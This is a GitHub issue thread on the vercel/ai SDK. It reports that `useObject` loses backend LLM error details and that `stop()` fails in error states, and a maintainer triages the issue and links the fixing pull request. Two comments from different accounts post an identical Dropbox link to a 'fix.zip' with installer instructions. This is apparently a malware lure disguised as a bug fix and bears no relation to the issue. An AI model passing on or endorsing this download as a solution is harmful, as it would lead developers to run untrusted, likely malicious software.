### ISSUE TITLE
`useObject` doesn't work properly when the LLM throws an error

### ISSUE THREAD

**Issue by Andriy-Kulak** [vercel/ai#2795]
### Description

There are 2 issues with use `useObject` when using it in conjunction with `streamObject` on the next.js API layer.

1. If the LLM (like chat gpt 4o throw an error such as: `"This model's maximum context length is 128000 tokens. However, your messages resulted in 154265 tokens (154107 in the messages, 158 in the functions). Please reduce the length of the messages or functions."`, `streamObject` will throw this error but on the front-end we just receive an empty error object

In front-end example below, error becomes an empty object that doesn't keep this error so I don't what the BE error is.

```
  const { object, submit, isLoading, error } = useObject({
    api: "/api/use-object",
    schema: reportCardSchema,
  });
````

2. When I try to stop the loading state by executing `stop()` during an error state with code below, nothing happens

```ts
  useEffect(() => {
    if (error) {
      toast.error(JSON.stringify(error));
      stop();
    }
  }, [error]);
```

Basically in error states this functionality is difficult to use and there are no examples on dealing with this

### Code example

ai npm version 3.3.9.  you can use api example from docs and generate an LLM error like going over max content tokens: https://sdk.vercel.ai/examples/next-pages/basics/streaming-object-generation

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by lgrammel** [comment]
https://github.com/vercel/ai/pull/2877 should help with some of this

**Comment by lgrammel** [comment]
### Identify issue type

**Identified type: Bug**  
Confidence: High

Rationale: The issue reports concrete broken behavior in existing `useObject`/`streamObject` error handling and loading-state control, not merely a request for documentation or examples.

Evidence:
- Reporter says `streamObject` throws an LLM context-length error, but `useObject` on the frontend only exposes an empty `error` object, losing the backend error details.
- Reporter says calling `stop()` when `error` is set does not stop the loading state.
- Maintainer linked PR #2877 as helping with the reported behavior.

**Comment by n1ckoates** [comment]
Fixed by https://github.com/vercel/ai/pull/2877
